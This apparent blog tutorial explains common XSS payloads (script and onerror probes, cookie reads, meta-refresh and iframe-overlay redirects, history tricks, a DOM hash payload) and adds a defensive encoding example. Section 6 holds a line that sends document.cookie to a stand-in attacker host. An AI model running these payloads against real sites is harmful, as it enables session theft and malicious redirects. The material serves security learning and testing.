Getting to Know Various XSS Payloads and Redirect Variants

Author: 0x6ick


1. Classic XSS Payloads

<script>alert(1)</script>

"><img src=x onerror=alert(1)>

The first is the plain script-tag probe for an HTML body context. The second is for input reflected inside a double-quoted attribute: the leading "> closes the attribute and the tag, and the img element's onerror handler fires because src=x never loads.

2. Payloads for Testing Cookie Access and Enumerating Objects

<script>alert(document.cookie)</script>

<script>alert(Object.keys(window))</script>

<script>alert(Object.getOwnPropertyNames(window))</script>

document.cookie only returns cookies that were set without the HttpOnly flag, so an empty alert does not mean there is no session cookie. Object.keys(window) lists the enumerable globals, which exposes the application's own global variables and functions; getOwnPropertyNames(window) also includes the non-enumerable ones.

3. Meta Refresh Redirect (Old-school, SEO-friendly)

<meta http-equiv="refresh" content="3; url=https://attacker-site.com">

The 3 is the delay in seconds before the browser navigates to the url. No JavaScript is involved, so this still works on pages that only strip script tags or block inline script.

4. Full-screen Iframe + Auto Redirect (Stealth Cloak Style)

<div style="position:absolute;top:0;left:0;width:100%;height:100%;z-index:9999">
  <iframe src="https://0x6ick.zone.id/search/label/Tools?m=1" width="100%" height="100%"></iframe>
</div>

The absolutely positioned div with a high z-index covers the whole viewport, and the iframe inside it shows whatever page the attacker chooses (the author's own blog is used here as a placeholder target). The address bar still shows the victim site. This only works if the framed page does not forbid framing with X-Frame-Options or a frame-ancestors CSP directive.

5. History Manipulation + Timer Redirect

<script>
  history.pushState({}, '', '/404');
  setTimeout(function() {
    window.location.replace("https://www.0x6ick.zone.id/search/label/Tools?m=1");
  }, 3000);
</script>

pushState rewrites the address bar to /404 without loading anything, so the victim sees a harmless-looking URL while the injected page keeps running. After 3 seconds location.replace navigates away; because replace substitutes the current history entry rather than pushing a new one, the Back button does not return to the /404 entry.

6. Payload Obfuscation & Exfiltration

<script>fetch('https://attacker.site/log?c='+document.cookie)</script>

This is the plain, unobfuscated form: it sends the victim's cookies to a server the attacker controls, where the request log records them. Cookies set with the HttpOnly flag are not readable through document.cookie and will not appear. A Content-Security-Policy with a restrictive connect-src blocks the fetch even when the script itself executes.

7. DOM-Based XSS Sample

An example that abuses the URL fragment (hash). The fragment is never sent to the server, so this only fires when the page's own JavaScript reads location.hash and writes it into the DOM through a sink such as innerHTML or document.write:

index.html#<script>alert(1)</script>

One caveat a tester should know: a <script> element inserted through innerHTML is not executed by browsers, so for an innerHTML sink the img/onerror payload from section 1 is the reliable choice; the script-tag form works for document.write and similar sinks.
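As an added JavaScript example (not code from the original post), the block below shows the defensive side of the payloads in sections 1, 2 and 7: a text-context encoder and an attribute-context encoder, applied to a small template that stands in for a page reflecting untrusted input (for instance location.hash) into both an element body and a quoted attribute. The template, the two counting helpers and the payload list are constructed for this example.

```javascript
'use strict';

// Encoder for HTML text context (between tags): the significant characters
// become entities, so '<script>' or '<img' can never open a tag.
const TEXT_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function encodeHtmlText(s) {
  return String(s).replace(/[&<>"'\/]/g, ch => TEXT_MAP[ch]);
}

// Encoder for a quoted attribute value: everything outside [A-Za-z0-9] becomes a
// hex entity, which neutralises the "> breakout and any event-handler injection.
function encodeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, ch => `&#x${ch.codePointAt(0).toString(16)};`);
}

// Constructed stand-in for a page that reflects untrusted input into an element
// body and a quoted attribute. Vulnerable form: raw string concatenation.
function renderVulnerable(input) {
  return `<div class="q">${input}</div><input value="${input}">`;
}

// Hardened form: the same template with the encoder for each sink's context.
function renderHardened(input) {
  return `<div class="q">${encodeHtmlText(input)}</div><input value="${encodeHtmlAttr(input)}">`;
}

// Crude markup audit: count tag openers (the template itself emits exactly two,
// <div> and <input>) and on* handlers inside tags (the template emits none).
function countTagOpeners(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}
function countEventHandlers(html) {
  return (html.match(/<[a-zA-Z][^>]*\son[a-z]+\s*=/gi) || []).length;
}
function injectsMarkup(html) {
  return countTagOpeners(html) > 2 || countEventHandlers(html) > 0;
}

// Payloads taken from the post, used here as sample input.
const PAYLOADS = [
  '<script>alert(1)</script>',
  '"><img src=x onerror=alert(1)>',
  '<script>alert(document.cookie)</script>',
];

// Report, per payload, whether each rendering introduced extra markup.
function audit(payloads = PAYLOADS) {
  return payloads.map(p => ({
    payload: p,
    vulnerableInjects: injectsMarkup(renderVulnerable(p)),
    hardenedInjects: injectsMarkup(renderHardened(p)),
  }));
}

for (const row of audit()) console.log(row);
```

Every payload injects markup through renderVulnerable and none does through renderHardened. When the sink is the DOM rather than a string template, the same idea is simpler still: assign untrusted data with textContent or setAttribute instead of innerHTML, and the encoding step becomes unnecessary.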

8. XSS Bug-Hunting Tips

  • Use tools such as Burp Suite, xsser and DalFox
  • Test with various encodings and filter-bypass tricks
  • Watch how browsers behave with uncommon tags and attributes

⚠️ Disclaimer

This article is intended solely for educational purposes. The creator shall not be held liable for any misuse, illegal activities, or damages resulting from the unauthorized use of this article.


"Where creativity, exploitation, and expression collide." — 6ickZone
